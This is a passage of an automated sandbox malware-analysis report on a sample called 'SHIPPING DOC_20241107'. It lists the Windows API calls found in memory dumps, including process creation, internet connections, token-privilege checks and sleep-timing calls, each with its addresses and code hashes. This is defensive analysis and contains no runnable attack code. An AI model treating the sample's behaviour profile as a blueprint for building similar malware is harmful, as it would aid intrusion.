                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2759813231-0
                                                                                                                              • Opcode ID: a1ceccdc5f42fa5cc382e9f753cf11dc29f66dbbceeb0681d000506c796c900d
                                                                                                                              • Instruction ID: 52a664dcb2fe315fc3097ab0027b9c13dfe910b200f4ad922307910251cacb85
                                                                                                                              • Opcode Fuzzy Hash: a1ceccdc5f42fa5cc382e9f753cf11dc29f66dbbceeb0681d000506c796c900d
                                                                                                                              • Instruction Fuzzy Hash: A8314E72D10108AFCB00EFA5C985AEFB7F9EF99310F00406AF511E7211DA759E418BA0
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 009B2612: GetWindowLongW.USER32(?,000000EB), ref: 009B2623
                                                                                                                              • GetCursorPos.USER32(?), ref: 00A3C53C
                                                                                                                              • TrackPopupMenuEx.USER32 ref: 00A3C551
                                                                                                                              • GetCursorPos.USER32(?), ref: 00A3C59E
                                                                                                                              • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,009EBB2B,?,?,?), ref: 00A3C5D8
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2864067406-0
                                                                                                                              • Opcode ID: 5990f3511083d61b5976bbd5e0ecb92a39f16d816b8a1f77f4d1a19f17d8c217
                                                                                                                              • Instruction ID: 4b0130f150a18d3b8ac2aae64661b3b9597b074b101114146456f25480416e01
                                                                                                                              • Opcode Fuzzy Hash: 5990f3511083d61b5976bbd5e0ecb92a39f16d816b8a1f77f4d1a19f17d8c217
                                                                                                                              • Instruction Fuzzy Hash: CD318636A00518EFCB15CF94CC58EEA7BF9EB49320F448069F9099B261D771AD51DFA0
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00A08432: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00A08449
                                                                                                                                • Part of subcall function 00A08432: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00A08453
                                                                                                                                • Part of subcall function 00A08432: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00A08462
                                                                                                                                • Part of subcall function 00A08432: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00A08469
                                                                                                                                • Part of subcall function 00A08432: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00A0847F
                                                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00A089CB
                                                                                                                              • _memcmp.LIBCMT ref: 00A089EE
                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A08A24
                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00A08A2B
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1592001646-0
                                                                                                                              • Opcode ID: 46b3a0c37b83c669b89963950989bc43b40d7dc7955c38b8e5c8d8efe3ad0c1b
                                                                                                                              • Instruction ID: 6b3d52e25b3afd8397fbcdc2e7af8dc7b67eeffa8ff1b9be7b4f42c6096163ab
                                                                                                                              • Opcode Fuzzy Hash: 46b3a0c37b83c669b89963950989bc43b40d7dc7955c38b8e5c8d8efe3ad0c1b
                                                                                                                              • Instruction Fuzzy Hash: A421BD31E40108EFCF10DFA4D945BEEB7B8EF40381F05805AE894A7280EB34AA05CF55
                                                                                                                              APIs
                                                                                                                              • __setmode.LIBCMT ref: 009D0B2E
                                                                                                                                • Part of subcall function 009B5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00A1793F,?,?,00000000), ref: 009B5B8C
                                                                                                                                • Part of subcall function 009B5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00A1793F,?,?,00000000,?,?), ref: 009B5BB0
                                                                                                                              • _fprintf.LIBCMT ref: 009D0B65
                                                                                                                              • OutputDebugStringW.KERNEL32(?), ref: 00A06111
                                                                                                                                • Part of subcall function 009D4C1A: _flsall.LIBCMT ref: 009D4C33
                                                                                                                              • __setmode.LIBCMT ref: 009D0B9A
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 521402451-0
                                                                                                                              • Opcode ID: ee715d14303d500706e754d3f40b7bc530bd3f5d36fdc86a2d342960873cd00d
                                                                                                                              • Instruction ID: 85f31a52f1155df811e5764aeefb954a94779683c0f4be9d2797a04d83ca3fac
                                                                                                                              • Opcode Fuzzy Hash: ee715d14303d500706e754d3f40b7bc530bd3f5d36fdc86a2d342960873cd00d
                                                                                                                              • Instruction Fuzzy Hash: CE1102329882087BDB04B7B4AC42BFE7B69AFC1324F14802BF105A72D2DE7558824795
                                                                                                                              APIs
                                                                                                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00A218B9
                                                                                                                                • Part of subcall function 00A21943: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00A21962
                                                                                                                                • Part of subcall function 00A21943: InternetCloseHandle.WININET(00000000), ref: 00A219FF
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Internet$CloseConnectHandleOpen
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1463438336-0
                                                                                                                              • Opcode ID: 9c14a574b55974ef3b2f48ca03770466a40f3fca083523822f79e0466c47535b
                                                                                                                              • Instruction ID: 5ece09f5150b847f9f9ee09288bf88047715c4adf054ea72afbcaa31ce7828c9
                                                                                                                              • Opcode Fuzzy Hash: 9c14a574b55974ef3b2f48ca03770466a40f3fca083523822f79e0466c47535b
                                                                                                                              • Instruction Fuzzy Hash: 7421F071200725BFEB119F68AD10FBBB7ADFF58700F10403AFA1596660DB31D85197A0
                                                                                                                              APIs
                                                                                                                              • GetFileAttributesW.KERNEL32(?,00A3FAC0), ref: 00A13AA8
                                                                                                                              • GetLastError.KERNEL32 ref: 00A13AB7
                                                                                                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 00A13AC6
                                                                                                                              • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00A3FAC0), ref: 00A13B23
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2267087916-0
                                                                                                                              • Opcode ID: a8760ed54af84c7eb8bfed5eca60d759fe20996aaa1a92e538a7bd4afcb05f5f
                                                                                                                              • Instruction ID: ae6fa8cc8285e303e0ddc85aac6b7a77eff2a81704ba579a1d62944292b5520b
                                                                                                                              • Opcode Fuzzy Hash: a8760ed54af84c7eb8bfed5eca60d759fe20996aaa1a92e538a7bd4afcb05f5f
                                                                                                                              • Instruction Fuzzy Hash: 1421A37190C2019F8700DF68D9809DBB7E8EE55764F144A5AF49AC72A1E731DE86CB82
                                                                                                                              APIs
                                                                                                                              • _free.LIBCMT ref: 009E5281
                                                                                                                                • Part of subcall function 009D588C: __FF_MSGBANNER.LIBCMT ref: 009D58A3
                                                                                                                                • Part of subcall function 009D588C: __NMSG_WRITE.LIBCMT ref: 009D58AA
                                                                                                                                • Part of subcall function 009D588C: RtlAllocateHeap.NTDLL(00B30000,00000000,00000001,00000000,?,?,?,009D0F53,?), ref: 009D58CF
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocateHeap_free
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 614378929-0
                                                                                                                              • Opcode ID: 908fb7b9d09a77fed1327dd353a1726d0ca9f8e1ee972554ef6f90b7a2f93bbc
                                                                                                                              • Instruction ID: 56d26dc606f534419d647198a0ba014f6d7c2bf66475cf03355a59e14acd754a
                                                                                                                              • Opcode Fuzzy Hash: 908fb7b9d09a77fed1327dd353a1726d0ca9f8e1ee972554ef6f90b7a2f93bbc
                                                                                                                              • Instruction Fuzzy Hash: 17110D32951A15EFCF222FB2AC0575F379CAF40364F12C526FA549A351DE348D418791
                                                                                                                              APIs
                                                                                                                              • _memset.LIBCMT ref: 009B4560
                                                                                                                                • Part of subcall function 009B410D: _memset.LIBCMT ref: 009B418D
                                                                                                                                • Part of subcall function 009B410D: _wcscpy.LIBCMT ref: 009B41E1
                                                                                                                                • Part of subcall function 009B410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 009B41F1
                                                                                                                              • KillTimer.USER32 ref: 009B45B5
                                                                                                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 009B45C4
                                                                                                                              • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 009ED5FE
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1378193009-0
                                                                                                                              • Opcode ID: c4e810e0f46dd1368b1985e83dec4b73ccfa820f7b97662fcd4c0b9b571bc003
                                                                                                                              • Instruction ID: 786b8e429d0c52434461f58005cd995cd516afe53a896e40e875c2f698f3bcf5
                                                                                                                              • Opcode Fuzzy Hash: c4e810e0f46dd1368b1985e83dec4b73ccfa820f7b97662fcd4c0b9b571bc003
                                                                                                                              • Instruction Fuzzy Hash: 9421F5709057849FEB338B648C45BE7BBECAB11318F04049EF68A56246D7B41E859B51
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 009B5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00A1793F,?,?,00000000), ref: 009B5B8C
                                                                                                                                • Part of subcall function 009B5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00A1793F,?,?,00000000,?,?), ref: 009B5BB0
                                                                                                                              • gethostbyname.WSOCK32(?,?,?), ref: 00A264AF
                                                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00A264BA
                                                                                                                              • _memmove.LIBCMT ref: 00A264E7
                                                                                                                              • inet_ntoa.WSOCK32(?), ref: 00A264F2
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1504782959-0
                                                                                                                              • Opcode ID: 463f3534506aa08745c16fe789d4e2856ecc7ad277a4bcb70d7c17681a610320
                                                                                                                              • Instruction ID: 7d9230ba701e48282546df1dacf8bce067e983399569b108f8ffef94a380de85
                                                                                                                              • Opcode Fuzzy Hash: 463f3534506aa08745c16fe789d4e2856ecc7ad277a4bcb70d7c17681a610320
                                                                                                                              • Instruction Fuzzy Hash: 9E113031910119AFCB04FFA4DE86EEEB7B9AF44310B144065F506A7261DF31AE14CBA1
                                                                                                                              APIs
                                                                                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 00A08E23
                                                                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00A08E35
                                                                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00A08E4B
                                                                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00A08E66
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3850602802-0
                                                                                                                              • Opcode ID: a0fe60b5cef286b10164c4485ea5c9e848f434bae8d9dd7356966be6d2e40afe
                                                                                                                              • Instruction ID: 88422a36a0a29b1e8cb84535a83571cdd3f492825bace5c36af7cf2541d42d6c
                                                                                                                              • Opcode Fuzzy Hash: a0fe60b5cef286b10164c4485ea5c9e848f434bae8d9dd7356966be6d2e40afe
                                                                                                                              • Instruction Fuzzy Hash: 36114879900218FFEB10DFA5CD85E9DBBB8FB08710F204095EA04B7290DB71AE10DB94
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 009B2612: GetWindowLongW.USER32(?,000000EB), ref: 009B2623
                                                                                                                              • DefDlgProcW.USER32(?,00000020,?), ref: 009B12D8
                                                                                                                              • GetClientRect.USER32(?,?,?,?,?), ref: 009EB77B
                                                                                                                              • GetCursorPos.USER32(?), ref: 009EB785
                                                                                                                              • ScreenToClient.USER32(?,?), ref: 009EB790
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4127811313-0
                                                                                                                              • Opcode ID: afefff4519ea66baa0f651a76eb0a1affd5b3d2b91087eb4b21db7e05b5634f6
                                                                                                                              • Instruction ID: 90dba097b3842a2317e44e11d719109dc5db9e829a38764d097a177a447292c2
                                                                                                                              • Opcode Fuzzy Hash: afefff4519ea66baa0f651a76eb0a1affd5b3d2b91087eb4b21db7e05b5634f6
                                                                                                                              • Instruction Fuzzy Hash: D7116A36A00019EFCB04DFA4DE95DEE77B8EB45311F804456F911E3250C730BA528BA5
                                                                                                                              APIs
                                                                                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00A1001E,?,00A11071,?,00008000), ref: 00A11490
                                                                                                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00A1001E,?,00A11071,?,00008000), ref: 00A114B5
                                                                                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00A1001E,?,00A11071,?,00008000), ref: 00A114BF
                                                                                                                              • Sleep.KERNEL32(?,?,?,?,?,?,?,00A1001E,?,00A11071,?,00008000), ref: 00A114F2
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CounterPerformanceQuerySleep
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2875609808-0
                                                                                                                              • Opcode ID: 44e60675ba6fc6590c0935f169b7ef306272dba3b2a62d75409983d9292bb4c9
                                                                                                                              • Instruction ID: b27e5cd0f1a969fcd4a416843c4cda8c0ad6d5f7e5d31409801a0581df120a3c
                                                                                                                              • Opcode Fuzzy Hash: 44e60675ba6fc6590c0935f169b7ef306272dba3b2a62d75409983d9292bb4c9
                                                                                                                              • Instruction Fuzzy Hash: A4113C71C0052EDBCF00DFE9E988AEEBB78FF09B11F014155EA45BA240CB3095A18BD5
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3016257755-0
                                                                                                                              • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                                                              • Instruction ID: 6c7387ee99140679dac825cb2ec6d469e5c951fc866c5cc21a0deb57fcf9bc93
                                                                                                                              • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                                                              • Instruction Fuzzy Hash: 36014B3204828ABBCF175EC5CC459EE7F26BF18354B598815FE5858131D336C9B1AB82
                                                                                                                              APIs
                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00A3B318
                                                                                                                              • ScreenToClient.USER32(?,?), ref: 00A3B330
                                                                                                                              • ScreenToClient.USER32(?,?), ref: 00A3B354
                                                                                                                              • InvalidateRect.USER32(?,?,?), ref: 00A3B36F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 357397906-0
                                                                                                                              • Opcode ID: cfc932c365083375194a3b5de62872935b99de6a159f32206f4c6b1c3eb131f2
                                                                                                                              • Instruction ID: 514d23d1c6d5cce724b296449dd411526e56b0f1d88671c0503b27300eeb9649
                                                                                                                              • Opcode Fuzzy Hash: cfc932c365083375194a3b5de62872935b99de6a159f32206f4c6b1c3eb131f2
                                                                                                                              • Instruction Fuzzy Hash: 171143B9D10249EFDB41CFA8C8859EEBBB9FF08310F108166E914E3620D735AA558F90
                                                                                                                              APIs
                                                                                                                              • _memset.LIBCMT ref: 00A3B678
                                                                                                                              • _memset.LIBCMT ref: 00A3B687
                                                                                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00A76F20,00A76F64), ref: 00A3B6B6
                                                                                                                              • CloseHandle.KERNEL32 ref: 00A3B6C8
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
